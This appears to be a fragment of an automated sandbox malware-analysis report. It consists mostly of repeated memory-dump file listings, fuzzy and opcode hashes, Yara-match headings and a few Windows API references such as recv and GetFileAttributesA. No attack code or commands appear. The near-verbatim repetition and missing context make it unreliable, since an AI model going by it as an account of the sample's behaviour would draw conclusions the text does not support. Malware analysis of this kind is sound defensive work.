                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                • Opcode ID: 3786d36932aa86be5b72a99e288758d14d6c916207c3adb53385dc0f7cb02ce4
                                                                                                                                                                                                                                                                • Instruction ID: 6a376b23b02f4d609142f30cd2021d49126d68417e798e2098c4c2e8c0e7d5f9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3786d36932aa86be5b72a99e288758d14d6c916207c3adb53385dc0f7cb02ce4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AC08C2801164009FD1D45BA40A88AA334E4A4B7A83F41B84E4789B1F1DA376C4BA610
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,009EDA1D,?,?,?,?), ref: 009E87B9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                • Opcode ID: 4d1daeb91fa99759e5740eb25ca3c8ebf587126ae66781583f4cb72ed168904e
                                                                                                                                                                                                                                                                • Instruction ID: 76c7da88f4389d1cc9552f139e3d92c32fb4a904a96f956b49aa9a7f1e56bc1d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d1daeb91fa99759e5740eb25ca3c8ebf587126ae66781583f4cb72ed168904e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DC0803401114045F51D45795058426370E5A077183F00B48D4355B1F1DB33DC47C650
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009EB3C8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                • Opcode ID: 117dc9c9fcc4fdfaa62b95f2287264942b14dc5dd21d9d2d59e13974d530d2f2
                                                                                                                                                                                                                                                                • Instruction ID: 9bb5aa9226daae73953467820c8e62b19b2b5e2e82a8c36dc87b94b7a2c036bc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 117dc9c9fcc4fdfaa62b95f2287264942b14dc5dd21d9d2d59e13974d530d2f2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29B11570A10268DFEB29CF19C894BDEB7B5EF45304F5085D8E909A7281D775AA88CF90
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1712030360.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 40f27f267acfd0ae615e8a730677f551ae25145938aa519d0e6384445a340c23
                                                                                                                                                                                                                                                                • Instruction ID: 1447f576471c1198b4d5d3023fdc75d2b74abd1b8f7524a6029d60948d4eb127
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40f27f267acfd0ae615e8a730677f551ae25145938aa519d0e6384445a340c23
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09B15EEB28D221FD710291C72B64AFB6B6FE5D6730339843EF847D5502F2846E4A6172
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1712030360.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 6dda77623503716c47342031ae17aa4d2f7aefd14394af087a89470fa4d286bf
                                                                                                                                                                                                                                                                • Instruction ID: ee54a1ce3b6e82f6733e3c3c63feddc3e89aa243534be27eb6d667954a83ba69
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6dda77623503716c47342031ae17aa4d2f7aefd14394af087a89470fa4d286bf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDE0ECA71485109EA14251D27A645BAB79AF596335330C076F447C7583E4991505A162
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1712030360.0000000004CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4cc0000_file.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: cbd0b57dc60277d8602cf6555ca7ec1e0937411761d1424175ca4b9ded189e9b
                                                                                                                                                                                                                                                                • Instruction ID: 164d83ee7af30bfc3f58680cc6d3aa314318f41e5ae8fcecadcc8799a29e4e05
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbd0b57dc60277d8602cf6555ca7ec1e0937411761d1424175ca4b9ded189e9b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AFE0D8B714C110ADA142D1C3776447A779EF4D7336335C07BF043C6543E5895609B5B2
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709683764.0000000000BD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709697024.0000000000BDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709713712.0000000000BEE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709725785.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709740538.0000000000C01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709752873.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709764488.0000000000C05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709781128.0000000000C17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709798976.0000000000C2C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709813508.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709826985.0000000000C3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709839358.0000000000C45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709850765.0000000000C46000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709863478.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709875979.0000000000C4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709888099.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709901380.0000000000C5D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709913085.0000000000C5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709924660.0000000000C5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709937066.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709949904.0000000000C68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709962676.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709974452.0000000000C6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709986617.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710002067.0000000000C81000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710014381.0000000000CAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710052072.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710064257.0000000000CDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710076874.0000000000CDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710089532.0000000000CE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710103458.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1710115733.0000000000CF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                • Opcode ID: 5ddf9e74450b582f109fb46741a25d91d56854762d631eefdfe593e58c3ba316
                                                                                                                                                                                                                                                                • Instruction ID: bf183abcf934c10687736a730a7857905b2e49efa0f439c826805a0285d8d234
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ddf9e74450b582f109fb46741a25d91d56854762d631eefdfe593e58c3ba316
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AC21A72E046288FDF25CF28ED407E9B7B5EB49345F1441EAD84DA7240E779AE858F40
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • recv.WS2_32(?,?,00000004,00000000), ref: 009EE10B
                                                                                                                                                                                                                                                                • recv.WS2_32(?,?,00000008,00000000), ref: 009EE140
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1709477652.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709465412.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709477652.0000000000A42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709522219.0000000000A49000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709534381.0000000000A4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709547687.0000000000A57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709627052.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709640534.0000000000BAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1709656758.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
